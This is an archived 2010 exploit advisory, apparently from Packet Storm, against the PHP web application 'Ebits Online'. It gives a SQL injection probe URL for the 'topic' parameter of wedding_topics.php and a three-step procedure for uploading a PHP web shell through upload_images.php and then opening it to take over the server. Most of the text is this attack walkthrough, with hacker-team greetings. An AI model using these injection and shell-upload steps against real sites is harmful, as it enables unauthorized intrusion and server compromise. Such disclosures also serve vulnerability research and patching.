Ebits Online SQL Injection / Shell Upload

2010-06-25T00:00:00
ID PACKETSTORM:90991
Type packetstorm
Reporter MeGo
Modified 2010-06-25T00:00:00

Description

                                        
                                            `  
  
  
===================================  
Ebits Online <= SQL & upload shell  
===================================  
  
###################################################  
# Exploit Title:Ebits Online <= SQL & upload shell#  
# Date: 23/6/2010 #  
# Author: MeGo #  
# Vendor: Link: http://www.ebitsonline.com #  
# Version: 1 #  
# Eamil: M1GO@live.com #  
# Platform / Tested on: Windows xp TYPE: php #  
# Category: webapps/0day #  
# MY Team: Team Hacker Egypt #  
******************************************************************  
#################  
#SQL [ Exploit ]#  
#################  
  
http://localhost/path/wedding_topics.php?topic= [ SQL ]  
  
http://localhost/path/wedding_topics.php?topic=18+order+by+6--  
  
******************************************************************  
  
##########################  
#Upload Shell [ Exploit ]#  
##########################  
  
Step [ 1 ]  
  
http://localhost/path/upload_images.php  
  
upload ur shell MeGo.php use [ Tember ]  
  
step [ 2 ]  
  
http://localhost/path/photos/MeGo.php  
  
dir of ur Evil :D   
  
step [ 3 ]  
  
You Own3r Box =))  
  
*******************************************************************  
Greetz To : Dr.Silnt HilL , Alsaeek , and all Member of MY Team :d  
  
SG: elga7ed , , exploit-db.com , inj3ct0r.com => only db Exploit :D  
*******************************************************************   
_________________________________________________________________  
Hotmail: Powerful Free email with security by Microsoft.  
https://signup.live.com/signup.aspx?id=60969  
  
  
`